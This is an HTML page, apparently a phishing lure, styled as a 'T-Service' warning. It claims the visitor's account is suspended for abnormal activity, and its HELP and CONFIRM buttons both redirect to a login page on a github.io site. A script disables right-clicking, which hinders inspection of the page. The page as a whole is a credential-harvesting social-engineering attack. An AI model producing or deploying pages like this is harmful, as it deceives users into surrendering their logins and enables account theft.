<!Doctype html>
<html>
<head>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">

<title> T-Service </title>
</head>
<link rel="icon" href="https://www.linkpicture.com/q/newlogo_5.png" type="image">
<body>

<center>
<div align="center" class="content">
TIPS
   <hr><br>

<h6 style="color:red"> <i></i></h6><br>
<div class="warning">&#9888;</div><p> There are abnormal activities with your account. It has been suspended. </p> <br> <br> <br> <br>
</py-script>

<button  style="color:rgb(154, 1, 1); font-size: 18px; padding: 11px 24px; " class="center-left" HELP onclick="window.location.href='https://teju0051.github.io/TService/login.html';"><b>HELP</b></button> 
<button  style="color:rgb(154, 1, 1); font-size: 18px; padding: 11px 24px; " class="center-right" HELP onclick="window.location.href='https://teju0051.github.io/TService/login.html';"><b>CONFIRM</b></button> 
<br> <BR>
</center>

<style>
  .warning {
    color: red;
    font-size: 30px;
    margin-bottom: 20px;
    font-family:system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
  }
  p{
    font-size: 20px;
  }
body {
 
  background-color: gray;
  zoom: 110%;
  background-image: url("https://wallpaperaccess.com/full/5622205.jpg");
  background-repeat: no-repeat;
  background-size: cover;
  background-position: center;
}
 
.content {
  position:absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
   background: BLACK;
   padding: 10px;
   color: grey;
   border-color: grey;
   border: auto;
   text-align: center;
   box-shadow: 0 0 10px rgba(0, 0, 0, 0.5); /* adding shadow */
   border: 1px solid grey;
   font-size: 20px;
   width: 90%;
   max-width: 600px;
   margin: 0 auto;
   
}  
button {
  padding: 10px 20px;
  font-size: 16px;

  color: black;

  margin: 2px 0;
  border: auto;
  cursor: pointer;
  display: inline-block;
  border-color: rgb(168, 0, 0);

  font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
}
.center-left{
  right: 0%;
  bottom: 45%; 
transform: translateX(-120%);
background-color: rgb(255, 255, 255);

 }
.center-right
{
right: 0%;
bottom: 45%; 
transform: translateY(50%);
transform: translateX(80%);
background-color: rgb(255, 255, 255);
font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;

}
b{
 font-family: serif;
}
p{
  font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
  color:red;
}

button {
padding: 5px;
font-size: 14px;
font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
}
   
  </style>
 <script>
  document.addEventListener('contextmenu', function (event) {
    event.preventDefault();
  });
</script>

      <style>
      /* Your existing styles here */
      
      /* New styles for the loading screen */
      .loading-screen {
          position: fixed;
          top: 0;
          left: 0;
          width: 100%;
          height: 100%;
          background-color: #111;
          display: flex;
          justify-content: center;
          align-items: center;
          flex-direction: column;
          z-index: 999;
      }
      
      .loading-screen h2 {
          color: rgb(128, 0, 0);
          font-size: 24px;
      }
      
      .loading-screen p {
          color: rgb(128, 0, 0);
          font-size: 18px;
      }
      
      .loading-screen .logo {
          opacity: 0;
          animation: fade-in-out 5s ease-in-out;
      }
      
      @keyframes fade-in-out {
          0% { opacity: 0; }
          20% { opacity: 1; }
          80% { opacity: 1; }
          100% { opacity: 0; }
      }
      </style>
	  


 


  

</body>
</html>
